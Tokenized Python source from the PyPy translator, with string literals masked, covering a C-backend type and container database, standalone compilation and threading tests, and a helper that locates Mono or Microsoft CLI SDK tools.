'<STR_LIT>' <EOL> argtypes . append ( cdecl ( argtype , argname ) ) <EOL> argtypes = '<STR_LIT:U+002CU+0020>' . join ( argtypes ) or '<STR_LIT>' <EOL> return resulttype . replace ( '<STR_LIT:@>' , '<STR_LIT>' % argtypes ) <EOL> elif isinstance ( T , OpaqueType ) : <EOL> if T == RuntimeTypeInfo : <EOL> return self . gcpolicy . rtti_type ( ) <EOL> elif T . hints . get ( "<STR_LIT>" , False ) : <EOL> node = self . gettypedefnode ( T , varlength = varlength ) <EOL> if who_asks is not None : <EOL> who_asks . dependencies [ node ] = True <EOL> return '<STR_LIT>' % node . name <EOL> elif T . hints . get ( '<STR_LIT>' , None ) == '<STR_LIT:C>' : <EOL> return '<STR_LIT>' % T . hints [ '<STR_LIT>' ] <EOL> else : <EOL> return '<STR_LIT>' % ( <EOL> valid_identifier ( '<STR_LIT>' + T . tag ) , ) <EOL> elif isinstance ( T , llgroup . GroupType ) : <EOL> return "<STR_LIT>" <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % ( T , ) ) <EOL> def getcontainernode ( self , container , _dont_write_c_code = True , ** buildkwds ) : <EOL> try : <EOL> node = self . containernodes [ container ] <EOL> except KeyError : <EOL> T = typeOf ( container ) <EOL> if isinstance ( T , ( lltype . Array , lltype . Struct ) ) : <EOL> if hasattr ( self . gctransformer , '<STR_LIT>' ) : <EOL> self . gctransformer . consider_constant ( T , container ) <EOL> nodefactory = ContainerNodeFactory [ T . __class__ ] <EOL> node = nodefactory ( self , T , container , ** buildkwds ) <EOL> self . containernodes [ container ] = node <EOL> if not _dont_write_c_code : <EOL> return node <EOL> kind = getattr ( node , '<STR_LIT>' , '<STR_LIT:?>' ) <EOL> self . containerstats [ kind ] = self . containerstats . get ( kind , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> self . containerlist . append ( node ) <EOL> if self . completed : <EOL> pass <EOL> return node <EOL> def get ( self , obj ) : <EOL> if <NUM_LIT:1> : <EOL> if isinstance ( obj , CConstant ) : <EOL> return obj . c_name <EOL> T = typeOf ( obj ) <EOL> if isinstance ( T , Primitive ) or T == GCREF : <EOL> return PrimitiveName [ T ] ( obj , self ) <EOL> elif isinstance ( T , Ptr ) : <EOL> if obj : <EOL> try : <EOL> container = obj . _obj <EOL> except lltype . DelayedPointer : <EOL> name = obj . _obj0 <EOL> assert name . startswith ( '<STR_LIT>' ) <EOL> n = len ( '<STR_LIT>' ) <EOL> if len ( name ) == n : <EOL> raise <EOL> if isinstance ( lltype . typeOf ( obj ) . TO , lltype . FuncType ) : <EOL> if id ( obj ) in self . delayedfunctionnames : <EOL> return self . delayedfunctionnames [ id ( obj ) ] [ <NUM_LIT:0> ] <EOL> funcname = name [ n : ] <EOL> funcname = self . namespace . uniquename ( '<STR_LIT>' + funcname ) <EOL> self . delayedfunctionnames [ id ( obj ) ] = funcname , obj <EOL> else : <EOL> funcname = None <EOL> self . delayedfunctionptrs . append ( obj ) <EOL> return funcname <EOL> else : <EOL> if id ( obj ) in self . delayedfunctionnames : <EOL> forcename = self . delayedfunctionnames [ id ( obj ) ] [ <NUM_LIT:0> ] <EOL> node = self . getcontainernode ( container , <EOL> forcename = forcename ) <EOL> assert node . ptrname == forcename <EOL> return forcename <EOL> if isinstance ( container , int ) : <EOL> return '<STR_LIT>' % ( cdecl ( self . gettype ( T ) , '<STR_LIT>' ) , <EOL> obj . _obj ) <EOL> node = self . getcontainernode ( container ) <EOL> return node . ptrname <EOL> else : <EOL> return '<STR_LIT>' % ( cdecl ( self . gettype ( T ) , '<STR_LIT>' ) , ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % ( obj , ) ) <EOL> def complete ( self , show_progress = True ) : <EOL> assert not self . completed <EOL> if self . translator and self . translator . rtyper : <EOL> do_the_getting ( self , self . translator . rtyper ) <EOL> def dump ( ) : <EOL> lst = [ '<STR_LIT>' % keyvalue <EOL> for keyvalue in self . containerstats . items ( ) ] <EOL> lst . sort ( ) <EOL> log . event ( '<STR_LIT>' % ( i , '<STR_LIT:U+0020>' . join ( lst ) ) ) <EOL> i = self . completedcontainers <EOL> if show_progress : <EOL> show_i = ( i // <NUM_LIT:1000> + <NUM_LIT:1> ) * <NUM_LIT:1000> <EOL> else : <EOL> show_i = - <NUM_LIT:1> <EOL> finish_callbacks = [ ] <EOL> if self . gctransformer : <EOL> finish_callbacks . append ( ( '<STR_LIT>' , <EOL> self . gctransformer . finish_helpers ) ) <EOL> if self . stacklesstransformer : <EOL> finish_callbacks . append ( ( '<STR_LIT>' , <EOL> self . stacklesstransformer . finish ) ) <EOL> if self . gctransformer : <EOL> finish_callbacks . append ( ( '<STR_LIT>' , <EOL> self . gctransformer . get_final_dependencies ) ) <EOL> finish_callbacks . append ( ( '<STR_LIT>' , <EOL> self . gctransformer . finish_tables ) ) <EOL> def add_dependencies ( newdependencies ) : <EOL> for value in newdependencies : <EOL> if isinstance ( typeOf ( value ) , ContainerType ) : <EOL> self . getcontainernode ( value ) <EOL> else : <EOL> self . get ( value ) <EOL> while True : <EOL> while True : <EOL> while self . pendingsetupnodes : <EOL> lst = self . pendingsetupnodes <EOL> self . pendingsetupnodes = [ ] <EOL> for nodedef in lst : <EOL> nodedef . setup ( ) <EOL> if i == len ( self . containerlist ) : <EOL> break <EOL> node = self . containerlist [ i ] <EOL> add_dependencies ( node . enum_dependencies ( ) ) <EOL> i += <NUM_LIT:1> <EOL> self . completedcontainers = i <EOL> if i == show_i : <EOL> dump ( ) <EOL> show_i += <NUM_LIT:1000> <EOL> if self . delayedfunctionptrs : <EOL> lst = self . delayedfunctionptrs <EOL> self . delayedfunctionptrs = [ ] <EOL> progress = False <EOL> for fnptr in lst : <EOL> try : <EOL> fnptr . _obj <EOL> except lltype . DelayedPointer : <EOL> self . delayedfunctionptrs . append ( fnptr ) <EOL> else : <EOL> self . get ( fnptr ) <EOL> progress = True <EOL> if progress : <EOL> continue <EOL> if finish_callbacks : <EOL> logmsg , finish = finish_callbacks . pop ( <NUM_LIT:0> ) <EOL> newdependencies = finish ( ) <EOL> log . database ( logmsg ) <EOL> if newdependencies : <EOL> add_dependencies ( newdependencies ) <EOL> continue <EOL> break <EOL> assert not self . delayedfunctionptrs <EOL> self . completed = True <EOL> if show_progress : <EOL> dump ( ) <EOL> log . database ( "<STR_LIT>" ) <EOL> def globalcontainers ( self ) : <EOL> for node in self . containerlist : <EOL> if node . globalcontainer : <EOL> yield node <EOL> def get_lltype_of_exception_value ( self ) : <EOL> if self . translator is not None and self . translator . rtyper is not None : <EOL> exceptiondata = self . translator . rtyper . getexceptiondata ( ) <EOL> return exceptiondata . lltype_of_exception_value <EOL> else : <EOL> return Ptr ( PyObject ) <EOL> def getstructdeflist ( self ) : <EOL> result = [ ] <EOL> seen = { } <EOL> def produce ( node ) : <EOL> if node not in seen : <EOL> deps = node . dependencies . keys ( ) <EOL> deps . sort ( key = lambda x : x . name ) <EOL> for othernode in deps : <EOL> produce ( othernode ) <EOL> result . append ( node ) <EOL> seen [ node ] = True <EOL> nodes = self . structdefnodes . values ( ) <EOL> nodes . sort ( key = lambda x : x . name ) <EOL> for node in nodes : <EOL> produce ( node ) <EOL> return result <EOL> def need_sandboxing ( self , fnobj ) : <EOL> if not self . sandbox : <EOL> return False <EOL> if hasattr ( fnobj , '<STR_LIT>' ) : <EOL> return not fnobj . _safe_not_sandboxed <EOL> else : <EOL> return "<STR_LIT>" <EOL> def prepare_inline_helpers ( self ) : <EOL> all_nodes = self . globalcontainers ( ) <EOL> funcnodes = [ node for node in all_nodes if node . nodekind == '<STR_LIT>' ] <EOL> graphs = [ ] <EOL> for node in funcnodes : <EOL> for graph in node . graphs_to_patch ( ) : <EOL> graphs . append ( graph ) <EOL> self . gctransformer . prepare_inline_helpers ( graphs ) <EOL> def all_graphs ( self ) : <EOL> graphs = [ ] <EOL> for node in self . containerlist : <EOL> if node . nodekind == '<STR_LIT>' : <EOL> for graph in node . graphs_to_patch ( ) : <EOL> graphs . append ( graph ) <EOL> return graphs </s>
<s> import py <EOL> import sys , os , re <EOL> from pypy . rlib . rarithmetic import r_longlong <EOL> from pypy . rlib . debug import ll_assert , debug_print <EOL> from pypy . translator . translator import TranslationContext <EOL> from pypy . translator . backendopt import all <EOL> from pypy . translator . c . genc import CStandaloneBuilder , ExternalCompilationInfo <EOL> from pypy . annotation . listdef import s_list_of_strings <EOL> from pypy . tool . udir import udir <EOL> from pypy . tool . autopath import pypydir <EOL> class TestStandalone ( object ) : <EOL> config = None <EOL> def test_hello_world ( self ) : <EOL> def entry_point ( argv ) : <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" ) <EOL> argv = argv [ <NUM_LIT:1> : ] <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" + str ( len ( argv ) ) + "<STR_LIT:\n>" ) <EOL> for s in argv : <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" + str ( s ) + "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> data = cbuilder . cmdexec ( '<STR_LIT>' ) <EOL> assert data . startswith ( '''<STR_LIT>''' ) <EOL> def test_print ( self ) : <EOL> def entry_point ( argv ) : <EOL> print "<STR_LIT>" <EOL> argv = argv [ <NUM_LIT:1> : ] <EOL> print "<STR_LIT>" , len ( argv ) <EOL> print "<STR_LIT>" , argv <EOL> print "<STR_LIT>" , <EOL> print [ len ( s ) for s in argv ] <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> data = cbuilder . cmdexec ( '<STR_LIT>' ) <EOL> assert data . startswith ( '''<STR_LIT>''' <EOL> '''<STR_LIT>''' <EOL> '''<STR_LIT>''' <EOL> '''<STR_LIT>''' ) <EOL> def test_counters ( self ) : <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rpython . lltypesystem . lloperation import llop <EOL> def entry_point ( argv ) : <EOL> llop . instrument_count ( lltype . Void , '<STR_LIT:test>' , <NUM_LIT:2> ) <EOL> llop . instrument_count ( lltype . Void , '<STR_LIT:test>' , <NUM_LIT:1> ) <EOL> llop . instrument_count ( lltype . Void , '<STR_LIT:test>' , <NUM_LIT:1> ) <EOL> llop . instrument_count ( lltype . Void , '<STR_LIT:test>' , <NUM_LIT:2> ) <EOL> llop . instrument_count ( lltype . Void , '<STR_LIT:test>' , <NUM_LIT:1> ) <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . config . translation . instrument = True <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , config = t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> counters_fname = udir . join ( "<STR_LIT>" ) <EOL> os . environ [ '<STR_LIT>' ] = str ( counters_fname ) <EOL> try : <EOL> data = cbuilder . cmdexec ( ) <EOL> finally : <EOL> del os . environ [ '<STR_LIT>' ] <EOL> f = counters_fname . open ( '<STR_LIT:rb>' ) <EOL> counters_data = f . read ( ) <EOL> f . close ( ) <EOL> import struct <EOL> counters = struct . unpack ( "<STR_LIT>" , counters_data ) <EOL> assert counters == ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> ) <EOL> def test_prof_inline ( self ) : <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> def add ( a , b ) : <EOL> return a + b - b + b - b + b - b + b - b + b - b + b - b + b <EOL> def entry_point ( argv ) : <EOL> tot = <NUM_LIT:0> <EOL> x = int ( argv [ <NUM_LIT:1> ] ) <EOL> while x > <NUM_LIT:0> : <EOL> tot = add ( tot , x ) <EOL> x -= <NUM_LIT:1> <EOL> os . write ( <NUM_LIT:1> , str ( tot ) ) <EOL> return <NUM_LIT:0> <EOL> from pypy . translator . interactive import Translation <EOL> t = Translation ( entry_point , backend = '<STR_LIT:c>' , standalone = True ) <EOL> t . backendopt ( inline_threshold = <NUM_LIT:100> , profile_based_inline = "<STR_LIT>" ) <EOL> exe = t . compile ( ) <EOL> out = py . process . cmdexec ( "<STR_LIT>" % exe ) <EOL> assert int ( out ) == <NUM_LIT> * <NUM_LIT> / <NUM_LIT:2> <EOL> t = Translation ( entry_point , backend = '<STR_LIT:c>' , standalone = True ) <EOL> t . backendopt ( inline_threshold = all . INLINE_THRESHOLD_FOR_TEST * <NUM_LIT:0.5> , <EOL> profile_based_inline = "<STR_LIT>" ) <EOL> exe = t . compile ( ) <EOL> out = py . process . cmdexec ( "<STR_LIT>" % exe ) <EOL> assert int ( out ) == <NUM_LIT> * <NUM_LIT> / <NUM_LIT:2> <EOL> def test_frexp ( self ) : <EOL> import math <EOL> def entry_point ( argv ) : <EOL> m , e = math . frexp ( <NUM_LIT:0> ) <EOL> x , y = math . frexp ( <NUM_LIT:0> ) <EOL> print m , x <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> data = cbuilder . cmdexec ( '<STR_LIT>' ) <EOL> assert map ( float , data . split ( ) ) == [ <NUM_LIT:0.0> , <NUM_LIT:0.0> ] <EOL> def test_profopt ( self ) : <EOL> def add ( a , b ) : <EOL> return a + b - b + b - b + b - b + b - b + b - b + b - b + b <EOL> def entry_point ( argv ) : <EOL> tot = <NUM_LIT:0> <EOL> x = int ( argv [ <NUM_LIT:1> ] ) <EOL> while x > <NUM_LIT:0> : <EOL> tot = add ( tot , x ) <EOL> x -= <NUM_LIT:1> <EOL> os . write ( <NUM_LIT:1> , str ( tot ) ) <EOL> return <NUM_LIT:0> <EOL> from pypy . translator . interactive import Translation <EOL> t = Translation ( entry_point , backend = '<STR_LIT:c>' , standalone = True , profopt = "<STR_LIT>" ) <EOL> t . backendopt ( ) <EOL> exe = t . compile ( ) <EOL> out = py . process . cmdexec ( "<STR_LIT>" % exe ) <EOL> assert int ( out ) == <NUM_LIT> * <NUM_LIT> / <NUM_LIT:2> <EOL> t = Translation ( entry_point , backend = '<STR_LIT:c>' , standalone = True , profopt = "<STR_LIT>" , <EOL> noprofopt = True ) <EOL> t . backendopt ( ) <EOL> exe = t . compile ( ) <EOL> out = py . process . cmdexec ( "<STR_LIT>" % exe ) <EOL> assert int ( out ) == <NUM_LIT> * <NUM_LIT> / <NUM_LIT:2> <EOL> if hasattr ( os , '<STR_LIT>' ) : <EOL> def test_os_setpgrp ( self ) : <EOL> def entry_point ( argv ) : <EOL> os . setpgrp ( ) <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> def test_profopt_mac_osx_bug ( self ) : <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> def entry_point ( argv ) : <EOL> import os <EOL> pid = os . fork ( ) <EOL> if pid : <EOL> os . waitpid ( pid , <NUM_LIT:0> ) <EOL> else : <EOL> os . _exit ( <NUM_LIT:0> ) <EOL> return <NUM_LIT:0> <EOL> from pypy . translator . interactive import Translation <EOL> t = Translation ( entry_point , backend = '<STR_LIT:c>' , standalone = True , profopt = "<STR_LIT>" ) <EOL> t . backendopt ( ) <EOL> exe = t . compile ( ) <EOL> t = Translation ( entry_point , backend = '<STR_LIT:c>' , standalone = True , profopt = "<STR_LIT>" , <EOL> noprofopt = True ) <EOL> t . backendopt ( ) <EOL> exe = t . compile ( ) <EOL> def test_standalone_large_files ( self ) : <EOL> from pypy . module . posix . test . test_posix2 import need_sparse_files <EOL> need_sparse_files ( ) <EOL> filename = str ( udir . join ( '<STR_LIT>' ) ) <EOL> r4800000000 = r_longlong ( <NUM_LIT> L ) <EOL> def entry_point ( argv ) : <EOL> fd = os . open ( filename , os . O_RDWR | os . O_CREAT , <NUM_LIT:0> <NUM_LIT> ) <EOL> os . lseek ( fd , r4800000000 , <NUM_LIT:0> ) <EOL> os . write ( fd , "<STR_LIT:$>" ) <EOL> newpos = os . lseek ( fd , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> if newpos == r4800000000 + <NUM_LIT:1> : <EOL> print "<STR_LIT:OK>" <EOL> else : <EOL> print "<STR_LIT>" <EOL> os . close ( fd ) <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> data = cbuilder . cmdexec ( '<STR_LIT>' ) <EOL> assert data . strip ( ) == "<STR_LIT:OK>" <EOL> def test_separate_files ( self ) : <EOL> fname = py . path . local ( pypydir ) . join ( <EOL> '<STR_LIT>' , '<STR_LIT:c>' , '<STR_LIT:src>' , '<STR_LIT>' ) <EOL> dirname = udir . join ( "<STR_LIT>" ) . ensure ( dir = <NUM_LIT:1> ) <EOL> fname2 = dirname . join ( "<STR_LIT>" ) <EOL> fname2 . write ( """<STR_LIT>""" ) <EOL> files = [ fname , fname2 ] <EOL> def entry_point ( argv ) : <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . eci = cbuilder . eci . merge ( <EOL> ExternalCompilationInfo ( separate_module_files = files ) ) <EOL> cbuilder . generate_source ( ) <EOL> makefile = udir . join ( cbuilder . modulename , '<STR_LIT>' ) . read ( ) <EOL> assert "<STR_LIT>" in makefile <EOL> assert "<STR_LIT>" in makefile <EOL> assert "<STR_LIT>" not in makefile <EOL> assert "<STR_LIT>" in makefile <EOL> assert "<STR_LIT>" in makefile <EOL> class TestMaemo ( TestStandalone ) : <EOL> def setup_class ( cls ) : <EOL> from pypy . translator . platform . maemo import check_scratchbox <EOL> check_scratchbox ( ) <EOL> from pypy . config . pypyoption import get_pypy_config <EOL> config = get_pypy_config ( translating = True ) <EOL> config . translation . platform = '<STR_LIT>' <EOL> cls . config = config <EOL> def test_profopt ( self ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> def test_prof_inline ( self ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> class TestThread ( object ) : <EOL> gcrootfinder = '<STR_LIT>' <EOL> config = None <EOL> def compile ( self , entry_point ) : <EOL> t = TranslationContext ( self . config ) <EOL> t . config . translation . gc = "<STR_LIT>" <EOL> t . config . translation . gcrootfinder = self . gcrootfinder <EOL> t . config . translation . thread = True <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> return t , cbuilder <EOL> def test_stack_size ( self ) : <EOL> import time <EOL> from pypy . module . thread import ll_thread <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rlib . objectmodel import invoke_around_extcall <EOL> class State : <EOL> pass <EOL> state = State ( ) <EOL> def before ( ) : <EOL> debug_print ( "<STR_LIT>" ) <EOL> ll_assert ( not ll_thread . acquire_NOAUTO ( state . ll_lock , False ) , <EOL> "<STR_LIT>" ) <EOL> ll_thread . release_NOAUTO ( state . ll_lock ) <EOL> debug_print ( "<STR_LIT>" ) <EOL> def after ( ) : <EOL> debug_print ( "<STR_LIT>" ) <EOL> ll_thread . acquire_NOAUTO ( state . ll_lock , True ) <EOL> debug_print ( "<STR_LIT>" ) <EOL> def recurse ( n ) : <EOL> if n > <NUM_LIT:0> : <EOL> return recurse ( n - <NUM_LIT:1> ) + <NUM_LIT:1> <EOL> else : <EOL> time . sleep ( <NUM_LIT> ) <EOL> return <NUM_LIT:0> <EOL> RECURSION = <NUM_LIT> <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> RECURSION = <NUM_LIT> * <NUM_LIT:1000> <EOL> def bootstrap ( ) : <EOL> recurse ( RECURSION ) <EOL> state . count += <NUM_LIT:1> <EOL> def entry_point ( argv ) : <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" ) <EOL> error = ll_thread . set_stacksize ( int ( argv [ <NUM_LIT:1> ] ) ) <EOL> assert error == <NUM_LIT:0> <EOL> s1 = State ( ) ; s2 = State ( ) ; s3 = State ( ) <EOL> s1 . x = <NUM_LIT> ; s2 . x = <NUM_LIT> ; s3 . x = <NUM_LIT> <EOL> state . ll_lock = ll_thread . allocate_ll_lock ( ) <EOL> after ( ) <EOL> state . count = <NUM_LIT:0> <EOL> invoke_around_extcall ( before , after ) <EOL> ident1 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> ident2 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> ident3 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> while True : <EOL> if state . count == <NUM_LIT:3> : <EOL> break <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> assert s1 . x == <NUM_LIT> <EOL> assert s2 . x == <NUM_LIT> <EOL> assert s3 . x == <NUM_LIT> <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> t , cbuilder = self . compile ( entry_point ) <EOL> for test_kb in [ <NUM_LIT:32> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] : <EOL> print >> sys . stderr , '<STR_LIT>' % ( test_kb , ) , <EOL> try : <EOL> data = cbuilder . cmdexec ( str ( test_kb * <NUM_LIT> ) ) <EOL> except Exception , e : <EOL> if e . __class__ is not Exception : <EOL> raise <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> else : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> assert data == '<STR_LIT>' <EOL> assert test_kb > <NUM_LIT:32> <EOL> break <EOL> else : <EOL> py . test . fail ( "<STR_LIT>" ) <EOL> def test_thread_and_gc ( self ) : <EOL> import time , gc <EOL> from pypy . module . thread import ll_thread <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rlib . objectmodel import invoke_around_extcall <EOL> class State : <EOL> pass <EOL> state = State ( ) <EOL> def before ( ) : <EOL> ll_assert ( not ll_thread . acquire_NOAUTO ( state . ll_lock , False ) , <EOL> "<STR_LIT>" ) <EOL> ll_thread . release_NOAUTO ( state . ll_lock ) <EOL> def after ( ) : <EOL> ll_thread . acquire_NOAUTO ( state . ll_lock , True ) <EOL> class Cons : <EOL> def __init__ ( self , head , tail ) : <EOL> self . head = head <EOL> self . tail = tail <EOL> def bootstrap ( ) : <EOL> state . xlist . append ( Cons ( <NUM_LIT> , Cons ( <NUM_LIT> , None ) ) ) <EOL> gc . collect ( ) <EOL> def entry_point ( argv ) : <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" ) <EOL> state . xlist = [ ] <EOL> x2 = Cons ( <NUM_LIT> , Cons ( <NUM_LIT> , Cons ( <NUM_LIT> , None ) ) ) <EOL> state . ll_lock = ll_thread . allocate_ll_lock ( ) <EOL> after ( ) <EOL> invoke_around_extcall ( before , after ) <EOL> ident1 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> ident2 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> gc . collect ( ) <EOL> ident3 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> ident4 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> ident5 = ll_thread . start_new_thread ( bootstrap , ( ) ) <EOL> while True : <EOL> gc . collect ( ) <EOL> if len ( state . xlist ) == <NUM_LIT:5> : <EOL> break <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> assert x2 . head == <NUM_LIT> <EOL> assert x2 . tail . head == <NUM_LIT> <EOL> assert x2 . tail . tail . head == <NUM_LIT> <EOL> assert x2 . tail . tail . tail is None <EOL> for i in range ( <NUM_LIT:5> ) : <EOL> assert state . xlist [ i ] . head == <NUM_LIT> <EOL> assert state . xlist [ i ] . tail . head == <NUM_LIT> <EOL> assert state . xlist [ i ] . tail . tail is None <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" % ( i + <NUM_LIT:1> ) ) <EOL> return <NUM_LIT:0> <EOL> t , cbuilder = self . compile ( entry_point ) <EOL> data = cbuilder . cmdexec ( '<STR_LIT>' ) <EOL> assert data . splitlines ( ) == [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] </s>
<s> import os . path <EOL> import platform <EOL> import py <EOL> class AbstractSDK ( object ) : <EOL> def _check_helper ( cls , helper ) : <EOL> if py . path . local . sysfind ( helper ) is None : <EOL> py . test . skip ( "<STR_LIT>" % helper ) <EOL> else : <EOL> return helper <EOL> _check_helper = classmethod ( _check_helper ) <EOL> def runtime ( cls ) : <EOL> for item in cls . RUNTIME : <EOL> cls . _check_helper ( item ) <EOL> return cls . RUNTIME <EOL> runtime = classmethod ( runtime ) <EOL> def ilasm ( cls ) : <EOL> return cls . _check_helper ( cls . ILASM ) <EOL> ilasm = classmethod ( ilasm ) <EOL> def csc ( cls ) : <EOL> return cls . _check_helper ( cls . CSC ) <EOL> csc = classmethod ( csc ) <EOL> def peverify ( cls ) : <EOL> return cls . _check_helper ( cls . PEVERIFY ) <EOL> peverify = classmethod ( peverify ) <EOL> class MicrosoftSDK ( AbstractSDK ) : <EOL> RUNTIME = [ ] <EOL> ILASM = '<STR_LIT>' <EOL> CSC = '<STR_LIT>' <EOL> PEVERIFY = '<STR_LIT>' <EOL> def get_mono_version ( ) : <EOL> from commands import getoutput <EOL> lines = getoutput ( '<STR_LIT>' ) . splitlines ( ) <EOL> parts = lines [ <NUM_LIT:0> ] . split ( ) <EOL> iversion = parts . index ( '<STR_LIT:version>' ) <EOL> ver = parts [ iversion + <NUM_LIT:1> ] <EOL> ver = ver . split ( '<STR_LIT:.>' ) <EOL> return tuple ( map ( int , ver ) ) <EOL> class MonoSDK ( AbstractSDK ) : <EOL> RUNTIME = [ '<STR_LIT>' ] <EOL> ILASM = '<STR_LIT>' <EOL> CSC = '<STR_LIT>' <EOL> PEVERIFY = '<STR_LIT>' <EOL> @ classmethod <EOL> def runtime ( cls ) : <EOL> cls . _check_helper ( '<STR_LIT>' ) <EOL> ver = get_mono_version ( ) <EOL> if ( <NUM_LIT:2> , <NUM_LIT:1> ) < ver < ( <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:3> ) : <EOL> return [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> return [ '<STR_LIT>' ] <EOL> def key_as_dict ( handle ) : <EOL> import _winreg <EOL> i = <NUM_LIT:0> <EOL> res = { } <EOL> while True : <EOL> try : <EOL> name , value , type_ = _winreg . EnumValue ( handle , i ) <EOL> res [ name ] = value <EOL> i += <NUM_LIT:1> <EOL> except WindowsError : <EOL> break <EOL> return res <EOL> def find_mono_on_windows ( ) : <EOL> if platform . system ( ) != '<STR_LIT>' : <EOL> return None <EOL> import _winreg <EOL> try : <EOL> hMono = _winreg . OpenKey ( _winreg . HKEY_LOCAL_MACHINE , "<STR_LIT>" ) <EOL> except WindowsError : <EOL> return None <EOL> mono = key_as_dict ( hMono ) <EOL> mono_version = mono . get ( '<STR_LIT>' , None ) <EOL> if mono_version is None : <EOL> return None <EOL> hMono . Close ( ) <EOL> hMono_data = _winreg . OpenKey ( _winreg . HKEY_LOCAL_MACHINE , "<STR_LIT>" % mono_version ) <EOL> mono_data = key_as_dict ( hMono_data ) <EOL> mono_dir = str ( mono_data [ '<STR_LIT>' ] ) <EOL> return os . path . join ( mono_dir , '<STR_LIT>' ) <EOL> def get_default_SDK ( ) : <EOL> if platform . system ( ) == '<STR_LIT>' : <EOL> SDK = MicrosoftSDK <EOL> mono_bin = find_mono_on_windows ( ) <EOL> if mono_bin is not None : <EOL> SDK . ILASM = os . path . join ( mono_bin , '<STR_LIT>' ) <EOL> else : <EOL> SDK = MonoSDK <EOL> return SDK <EOL> SDK = get_default_SDK ( ) </s>
